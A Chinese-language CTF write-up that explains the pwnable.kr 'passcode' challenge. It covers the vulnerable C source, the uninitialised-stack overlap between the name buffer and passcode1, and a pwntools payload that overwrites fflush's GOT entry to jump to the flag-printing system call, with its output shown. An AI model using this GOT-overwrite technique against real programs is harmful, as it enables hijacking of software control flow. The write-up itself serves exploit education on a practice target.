第一次接触我也是比较懵，看了大佬们的wp后理解了一些

使用scp命令可以从服务器下到本地方便调试

passcode.c

#include <stdio.h>
#include <stdlib.h>

void login(){
        int passcode1;
        int passcode2;

        printf("enter passcode1 : ");
        scanf("%d", passcode1);
        fflush(stdin);

        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
        printf("enter passcode2 : ");
        scanf("%d", passcode2);

        printf("checking...\n");
        if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
                exit(0);
        }
}

void welcome(){
        char name[100];
        printf("enter you name : ");
        scanf("%100s", name);
        printf("Welcome %s!\n", name);
}

int main(){
        printf("Toddler's Secure Login System 1.0 beta.\n");

        welcome();
        login();

        // something after login...
        printf("Now I can safely trust you that you have credential :)\n");
        return 0;
}

这里运行直接输入两个数字是无法传递给passcode的，scanf的参数没有加&，是把passcode1，2当作地址，把输入赋给对应地址的内容，直接运行访存会报错segmentation fault。

看一下welcome，读取100字节给name。
这里调用welcome函数和login函数相邻而且都没有参数，所以他们的ebp位置是一样的，而回收栈空间只是简单的给esp加上一个数，执行welcome结束后调用login，原来栈帧里的值是没有变的而是等着其他函数去覆盖，但是呢passcode1又没法覆盖，所以它的值就是上一个函数栈帧对应地址的值。

用ida查看一下，name的地址是ebp-70h，passcode1是ebp-10h，passcode2是ebp-0Ch。70-10 = 60h = 96，刚好可以利用name覆盖passcode1，所以passcode1我们是可以控制的，又有scanf，就可以向任意可写地址写入数据。

再看一下welcome，第一个scanf后执行fflush和printf函数，我们就可以把got表的对应的fflush或者printf地址写成我们想要执行的地址，这样调用相应的函数时会直接跳到该地址

>>> from pwn import *
>>> p = process('./passcode')
[x] Starting local process './passcode'
[+] Starting local process './passcode': pid 154265
>>> e = ELF('./passcode')
>>> fflush_addr = hex(e.got['fflush']).encode('utf8')#0x804a004
>>> payload = b'a'*96+p32(0x0804a004)+'\n'.encode('utf8')+b'134514147'+'\n'.encode('utf8')
>>> p.send(payload)
>>> p.recvline()
[*] Process './passcode' stopped with exit code 0 (pid 154265)
"Toddler's Secure Login System 1.0 beta.\n"
>>> p.recvline()
'enter you name : Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x04\xa0\x04\x08!\n'
>>> p.recvline()
'Sorry mom.. I got confused about scanf usage :(\n'
>>> p.recvline()
'enter passcode1 : Now I can safely trust you that you have credential :)\n'

先覆盖passcode1为got表中存储fflush地址的地址，然后在scanf给passcode1的时候输入调用system(’/bin/cat flag’)函数的地址0x80485e3,因为是%d，要转化为十进制